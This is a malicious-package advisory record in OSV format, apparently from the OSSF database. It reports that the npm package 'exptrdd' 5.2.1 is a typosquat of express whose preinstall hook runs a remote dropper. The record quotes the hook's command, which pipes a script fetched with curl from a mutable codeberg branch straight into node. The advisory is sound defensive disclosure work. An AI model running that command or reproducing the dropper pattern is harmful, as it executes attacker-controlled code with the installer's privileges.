{"id":"MAL-2026-17245","summary":"Malicious code in exptrdd (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (6ba0b22d41f4edf82552b79417b6660bc1aaf311e4ec597b31674f0b6fdd5314)\npackage.json declares a preinstall lifecycle that runs `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`, fetching an unpinned script from a mutable branch and piping it directly into node on every `npm install`. The fetched code runs with the installer's privileges and can perform arbitrary actions on the host. The package identity is a typosquat of express: name is `exptrdd` while the description, keywords, author, and repository fields are copied verbatim from expressjs/express, so developers who mistype `express` install the dropper. The remote source (codeberg branch, proxied through web.archive.org) is attacker-controlled and mutable, so the executed payload can change at any time without a package republish.\n","modified":"2026-09-29T15:00:05.473405943Z","published":"2026-09-29T14:39:22Z","database_specific":{"malicious-packages-origins":[{"sha256":"6ba0b22d41f4edf82552b79417b6660bc1aaf311e4ec597b31674f0b6fdd5314","source":"amazon-inspector","versions":["5.2.1"],"id":"IN-MAL-2026-020626","import_time":"2026-09-29T14:44:37.152333146Z","modified_time":"2026-09-29T14:39:22Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/exptrdd/v/5.2.1"}],"affected":[{"package":{"name":"exptrdd","ecosystem":"npm","purl":"pkg:npm/exptrdd"},"versions":["5.2.1"],"database_specific":{"indicators":{"evidence_files":[{"path":"package.json","sha256":"35c27145148e489ab8fcc6ff09201ee8806a01b26dc2313199ccea49b8d9c400","tlsh":"3e51da21cc0e8c6326c5a2dd3c69a542612188078e41f81cf769539c8f8e56f71b9fbf"}],"package_integrity":[{"filename":"exptrdd-5.2.1.tgz","hashes":{"sha512_sri":"sha512-mheJ2q9ybO70PBK3n/0QC/Bg4DEi13mtUvkDtqqD0rjL6ILm4jxtv0W7rVi+/hYtc5AVBZFm3LKNeW0TBQuoRQ==","sha1":"fc58a91ed7c5a2fb45ff4576cfd90c9e2340ba94"}}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/exptrdd/MAL-2026-17245.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}